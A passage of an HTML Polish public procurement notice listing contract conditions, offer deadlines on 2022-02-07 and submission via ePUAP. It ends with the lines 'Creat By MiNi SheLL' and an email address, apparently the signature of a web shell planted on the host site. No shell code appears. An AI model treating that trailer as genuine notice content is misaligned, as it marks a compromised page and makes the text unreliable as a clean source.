potwierdzenia, że osoba<br/>działająca w imieniu wykonawcy jest umocowana do jego reprezentowania. UWAGA –<br/>Zamawiający może odstąpić od wymogu złożenia ww. dokumentu wraz z ofertą w przypadku<br/>podania w Formularzu Ofertowym w pkt. 18 (Zał. Nr 1 do SWZ) /oświadczeniu nr 3 do SWZ w<br/>miejscu wykropkowanym przez Wykonawcę adresu strony internetowej pod którym dostępne<br/>będą ww. dokumenty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> (...) ze względu na ograniczoną ilość wprowadzanych znaków w formularzu, dokumenty<br/>zamówienia (zamieszczone na stronie internetowej prowadzonego postępowania) zawierają<br/>wszystkie szczegółowe wymagania dot. niniejszego postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy opisuje Załącznik nr 5 do SWZ - Projek umowy (...) ze względu na<br/>ograniczoną ilość wprowadzanych znaków w formularzu, dokumenty<br/>zamówienia (zamieszczone na stronie internetowej prowadzonego postępowania) zawierają<br/>wszystkie szczegółowe wymagania dot. niniejszego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> (...) ze względu na ograniczoną ilość wprowadzanych znaków w formularzach, dokumenty zamówienia (zamieszczone na stronie internetowej prowadzonego postępowania) zawierają<br/>wszystkie szczegółowe wymagania dot. niniejszego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com